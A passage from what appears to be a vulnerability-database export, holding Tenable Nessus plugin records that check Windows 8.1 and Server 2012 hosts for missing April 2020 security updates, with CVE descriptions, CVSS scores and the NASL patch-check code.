rights. (CVE-2020-1000)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the User-Mode Power Service (UMPS) handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1015)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the\n Windows Push Notification Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An authenticated\n attacker could exploit this vulnerability by running a\n specially crafted application. The update addresses the\n vulnerability by correcting how the Windows Push\n Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS\n when it fails to properly handle queries. An attacker\n who successfully exploited this vulnerability could\n cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)\");\n # https://support.microsoft.com/en-us/help/4550971/windows-server-2012-update-kb4550971\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8d8c500e\");\n # https://support.microsoft.com/en-us/help/4550917/windows-server-2012-update-kb4550917\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ba6a0797\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4550971 or Cumulative Update KB4550917.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1008\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1020\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4550971', '4550917');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4550971, 4550917])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-05T14:17:10", "description": "The remote Windows host is missing security update 4550970 or cumulative update 4550961. It is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a Windows scheduled task improperly handles file redirections. An attacker who successfully exploited this vulnerability could delete a targeted file they would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0962)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959, CVE-2020-0960, CVE-2020-0988, CVE-2020-0992, CVE-2020-0994, CVE-2020-0995, CVE-2020-0999, CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code. Exploitation of the vulnerability requires that a program process a specially crafted image file. The update addresses the vulnerability by correcting how Microsoft Windows Codecs Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists in the way that the Microsoft Store Install Service handles file operations in protected locations. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi- master font - Adobe Type 1 PostScript format. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane. The update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the Windows kernel improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0821, CVE-2020-1007)\n\n - A remote code execution vulnerability exists when the Windows font library improperly handles specially crafted embedded fonts. An attacker who successfully exploited the vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0687)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-1094)\n\n - An elevation of privilege vulnerability exists in the Microsoft Windows Update Client when it does not properly handle privileges. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code on a target system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1015)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-0945, CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0982, CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the Windows Push Notification Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An authenticated attacker could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how the Windows Push Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0895, CVE-2020-0966, CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS when it fails to properly handle queries. An attacker who successfully exploited this vulnerability could cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when certain central processing units (CPU) speculatively access memory. An attacker who successfully exploited the vulnerability could read privileged data across trust boundaries. (CVE-2020-0955)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T00:00:00", "type": "nessus", "title": "KB4550970: Windows 8.1 and Windows Server 2012 R2 April 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0687", "CVE-2020-0821", "CVE-2020-0889", "CVE-2020-0895", "CVE-2020-0907", "CVE-2020-0936", "CVE-2020-0938", "CVE-2020-0945", "CVE-2020-0946", "CVE-2020-0952", "CVE-2020-0953", "CVE-2020-0955", "CVE-2020-0956", "CVE-2020-0958", "CVE-2020-0959", "CVE-2020-0960", "CVE-2020-0962", "CVE-2020-0964", "CVE-2020-0965", "CVE-2020-0966", "CVE-2020-0967", "CVE-2020-0968", "CVE-2020-0982", "CVE-2020-0987", "CVE-2020-0988", "CVE-2020-0992", "CVE-2020-0993", "CVE-2020-0994", "CVE-2020-0995", "CVE-2020-0999", "CVE-2020-1004", "CVE-2020-1005", "CVE-2020-1007", "CVE-2020-1008", "CVE-2020-1009", "CVE-2020-1014", "CVE-2020-1015", "CVE-2020-1016", "CVE-2020-1020", "CVE-2020-1027", "CVE-2020-1094"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_APR_4550961.NASL", "href": "https://www.tenable.com/plugins/nessus/135471", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135471);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-0687\",\n \"CVE-2020-0821\",\n \"CVE-2020-0889\",\n \"CVE-2020-0895\",\n \"CVE-2020-0907\",\n \"CVE-2020-0936\",\n \"CVE-2020-0938\",\n \"CVE-2020-0945\",\n \"CVE-2020-0946\",\n \"CVE-2020-0952\",\n \"CVE-2020-0953\",\n \"CVE-2020-0955\",\n \"CVE-2020-0956\",\n \"CVE-2020-0958\",\n \"CVE-2020-0959\",\n \"CVE-2020-0960\",\n \"CVE-2020-0962\",\n \"CVE-2020-0964\",\n \"CVE-2020-0965\",\n \"CVE-2020-0966\",\n \"CVE-2020-0967\",\n \"CVE-2020-0968\",\n \"CVE-2020-0982\",\n \"CVE-2020-0987\",\n \"CVE-2020-0988\",\n \"CVE-2020-0992\",\n \"CVE-2020-0993\",\n \"CVE-2020-0994\",\n \"CVE-2020-0995\",\n \"CVE-2020-0999\",\n \"CVE-2020-1004\",\n \"CVE-2020-1005\",\n \"CVE-2020-1007\",\n \"CVE-2020-1008\",\n \"CVE-2020-1009\",\n \"CVE-2020-1014\",\n \"CVE-2020-1015\",\n \"CVE-2020-1016\",\n \"CVE-2020-1020\",\n \"CVE-2020-1027\",\n \"CVE-2020-1094\"\n );\n script_xref(name:\"IAVA\", value:\"2020-A-0139-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/13\");\n script_xref(name:\"MSKB\", value:\"4550961\");\n script_xref(name:\"MSKB\", value:\"4550970\");\n script_xref(name:\"MSFT\", value:\"MS20-4550961\");\n script_xref(name:\"MSFT\", value:\"MS20-4550970\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0031\");\n\n script_name(english:\"KB4550970: Windows 8.1 and Windows Server 2012 R2 April 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4550970\nor cumulative update 4550961. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when a\n Windows scheduled task improperly handles file\n redirections. An attacker who successfully exploited\n this vulnerability could delete a targeted file they\n would not have permissions to. (CVE-2020-0936)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0962)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959,\n CVE-2020-0960, CVE-2020-0988, CVE-2020-0992,\n CVE-2020-0994, CVE-2020-0995, CVE-2020-0999,\n CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way\n that Microsoft Windows Codecs Library handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code. Exploitation\n of the vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists in the\n way that the Microsoft Store Install Service handles\n file operations in protected locations. An attacker who\n successfully exploited the vulnerability could execute\n code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows when the Windows Adobe Type Manager\n Library improperly handles a specially-crafted multi-\n master font - Adobe Type 1 PostScript format. For all\n systems except Windows 10, an attacker who successfully\n exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who\n successfully exploited the vulnerability could execute\n code in an AppContainer sandbox context with limited\n privileges and capabilities. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as convincing a user to open a\n specially crafted document or viewing it in the Windows\n Preview pane. The update addresses the vulnerability by\n correcting how the Windows Adobe Type Manager Library\n handles Type1 fonts. (CVE-2020-0938, CVE-2020-1020)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1027)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0821, CVE-2020-1007)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0687)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0964)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-1094)\n\n - An elevation of privilege vulnerability exists in the\n Microsoft Windows Update Client when it does not\n properly handle privileges. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. An attacker could then install\n programs; view, change or delete data. (CVE-2020-1014)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute arbitrary code on a target\n system. (CVE-2020-0907)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-1004)\n\n - An elevation of privilege vulnerability exists in the\n way that the User-Mode Power Service (UMPS) handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1015)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-0945,\n CVE-2020-0946)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0956, CVE-2020-0958)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0982,\n CVE-2020-0987, CVE-2020-1005)\n\n - An information disclosure vulnerability exists when the\n Windows Push Notification Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. An authenticated\n attacker could exploit this vulnerability by running a\n specially crafted application. The update addresses the\n vulnerability by correcting how the Windows Push\n Notification Service handles objects in memory.\n (CVE-2020-1016)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0895, CVE-2020-0966,\n CVE-2020-0967)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0952)\n\n - A denial of service vulnerability exists in Windows DNS\n when it fails to properly handle queries. An attacker\n who successfully exploited this vulnerability could\n cause the DNS service to become nonresponsive.\n (CVE-2020-0993)\n\n - An information disclosure vulnerability exists when\n certain central processing units (CPU) speculatively\n access memory. An attacker who successfully exploited\n the vulnerability could read privileged data across\n trust boundaries. (CVE-2020-0955)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4550970/windows-8-1-kb4550970\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4550961/windows-8-1-kb4550961\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4550970 or Cumulative Update KB4550961.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1008\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1020\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-04\";\nkbs = make_list('4550961', '4550970');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"04_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4550961, 4550970])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-06T14:18:03", "description": "The remote Windows host is missing security update 4550965 or cumulative update 4550964. It is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-0962)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0968)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-0889, CVE-2020-0953, CVE-2020-0959, CVE-2020-0960, CVE-2020-0988, CVE-2020-0992, CVE-2020-0994, CVE-2020-0995, CVE-2020-0999, CVE-2020-1008)\n\n - A remoted code execution vulnerability exists in the way that Microsoft Windows Codecs Library handles objects in memory. An attacker who successfully exploited the vulnerability could execute arbitrary code. Exploitation of the vulnerability requires that a program process a specially crafted image file. The update addresses the vulnerability by correcting how Microsoft Windows Codecs Library handles objects in memory. (CVE-2020-0965)\n\n - An elevation of privilege vulnerability exists in the way that the Microsoft Store Install Service handles file operations in protected locations. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1009)\n\n - A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi- master font - Adobe Type 1 PostScript format. For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely.\n For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane. The update 